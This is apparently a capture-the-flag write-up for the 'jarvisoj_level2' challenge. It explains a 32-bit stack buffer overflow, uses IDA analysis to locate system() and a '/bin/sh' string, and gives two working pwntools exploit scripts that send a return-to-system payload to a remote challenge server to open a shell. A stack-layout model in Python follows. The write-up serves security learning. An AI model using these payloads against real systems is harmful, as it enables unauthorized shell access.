jarvisoj_level2
2022-07-23 23:28:00 【长街395】
1. Inspect the file


We can see the binary is 32-bit and almost no protections are enabled. The exploit below relies on the binary not being position-independent, so the addresses of system@plt and the "/bin/sh" string are fixed and can be hard-coded.
2. IDA decompilation
Drag the binary into IDA and look at the code:
main() calls a function named vulnerable_function();
Let's look at vulnerable_function():
There is clearly a stack overflow: read() writes more bytes into the local buffer than it holds, and the buffer sits at ebp-0x88 (hence the 0x88+4 bytes of padding in the exploit below).
Since the binary already calls system(), we can certainly call it ourselves; all that is missing is the argument. Seeing a read() call, we couldn't help grinning (we could always read "/bin/sh" into memory ourselves)...
But hold on; just in case, let's check the strings first:


Wow, what a kind challenge author: "/bin/sh" is already in the binary.
Exploit code
There are two ways to do this.
(1) Return directly to system@plt
from pwn import *
r = remote("node4.buuoj.cn", 26046)
syad = 0x08048320  # address of system@plt
shad = 0x0804a024  # address of the "/bin/sh" string
# Layout after the padding: [system@plt][fake return address][arg1 = "/bin/sh"].
# We reach system@plt via `ret`, so nothing pushes a return address for us;
# p32(0) is the address system() will return to when it finishes. Any value
# works, since we already have a shell by then.
p = b"a" * (0x88 + 0x04) + p32(syad) + p32(0) + p32(shad)
r.recvuntil(b"Input:\n")
r.sendline(p)
r.interactive()
(2) Return to the existing `call system` instruction
from pwn import *
r = remote("node4.buuoj.cn", 26046)
shad = 0x0804a024  # address of the "/bin/sh" string
# 0x0804849e is the `call system` instruction inside the binary. Returning
# there means `call` pushes its own return address before jumping to system(),
# so the "/bin/sh" address goes directly after it and no fake return address
# is needed.
p = b"a" * (0x88 + 0x04) + p32(0x0804849e) + p32(shad)
r.recvuntil(b"Input:\n")
r.sendline(p)
r.interactive()
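To make the difference between the two payloads concrete, here is an added example (not part of the original writeup) that builds both payloads with plain struct.pack, the same as pwntools' p32(), and then models what the CPU does at vulnerable_function's final `ret`: which dword lands in eip, what system() will return to, and which dword it sees as its first argument. The addresses and the 0x88+4 padding come from the writeup; the assumption that the `call system` instruction is a 5-byte `call rel32` (so its pushed return address is 0x0804849e + 5) is mine.

```python
import struct

# Values taken from the writeup above (jarvisoj_level2, 32-bit):
BUF_TO_SAVED_EBP = 0x88   # distance from the start of buf to the saved ebp
SAVED_EBP_SIZE = 4        # saved ebp sits between buf and the return address on i386
SYSTEM_PLT = 0x08048320   # system@plt
CALL_SYSTEM = 0x0804849e  # address of the `call system` instruction
BINSH = 0x0804a024        # address of the "/bin/sh" string
CALL_INSN_LEN = 5         # assumption: `call rel32` is 5 bytes (E8 + imm32)

PADDING = b"a" * (BUF_TO_SAVED_EBP + SAVED_EBP_SIZE)


def p32(value: int) -> bytes:
    """Little-endian 4-byte pack, equivalent to pwntools' p32()."""
    return struct.pack("<I", value)


def u32(data: bytes) -> int:
    return struct.unpack("<I", data)[0]


def payload_ret2plt(fake_ret: int = 0) -> bytes:
    """Method (1): return straight into system@plt.

    We arrive via `ret`, so nothing pushes a return address for us: the dword
    after the target is what system() will return to (fake_ret), and only the
    dword after that is its first argument.
    """
    return PADDING + p32(SYSTEM_PLT) + p32(fake_ret) + p32(BINSH)


def payload_ret2call() -> bytes:
    """Method (2): return to the existing `call system` instruction.

    `call` pushes its own return address, so the argument goes directly after
    the target and the payload is one dword shorter.
    """
    return PADDING + p32(CALL_SYSTEM) + p32(BINSH)


def stack_after_ret(payload: bytes):
    """Model vulnerable_function's `leave; ret` on the overflowed frame.

    Returns (eip, stack): the dword popped into eip and the dwords that remain
    on the stack above esp, lowest address first.
    """
    tail = payload[len(PADDING):]
    if len(tail) < 4 or len(tail) % 4:
        raise ValueError("payload tail must be whole dwords")
    dwords = [u32(tail[i:i + 4]) for i in range(0, len(tail), 4)]
    return dwords[0], dwords[1:]


def argument_seen_by_system(payload: bytes) -> dict:
    """Follow control flow until system() is entered and report what it sees:
    under cdecl, [esp] is its return address and [esp+4] its first argument."""
    eip, stack = stack_after_ret(payload)
    if eip == CALL_SYSTEM:
        # `call system` pushes the address of the next instruction, then jumps.
        stack = [CALL_SYSTEM + CALL_INSN_LEN] + stack
    elif eip != SYSTEM_PLT:
        raise ValueError(f"unexpected eip {eip:#010x}")
    if len(stack) < 2:
        raise ValueError("system() would read its argument past the payload")
    return {"return_to": stack[0], "arg": stack[1]}


if __name__ == "__main__":
    for name, payload in (("ret2plt", payload_ret2plt()),
                          ("ret2call", payload_ret2call())):
        seen = argument_seen_by_system(payload)
        print(f"{name}: len={len(payload)} arg={seen['arg']:#010x} "
              f"return_to={seen['return_to']:#010x}")
```

Both payloads deliver 0x0804a024 as system()'s first argument; they differ only in where the return address comes from. Note that payload (1) contains four NUL bytes (the p32(0)); that is fine here because the input is consumed by read(), which does not stop at NUL, whereas a gets()- or strcpy()-style sink would have truncated it.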


Summary
Look at the function structure first, then work out the stack layout (buffer offset, saved ebp, return address). The addresses of system and "/bin/sh" are what make this a one-shot ret2text exploit, and the `call system` variant is a handy way to avoid supplying a fake return address.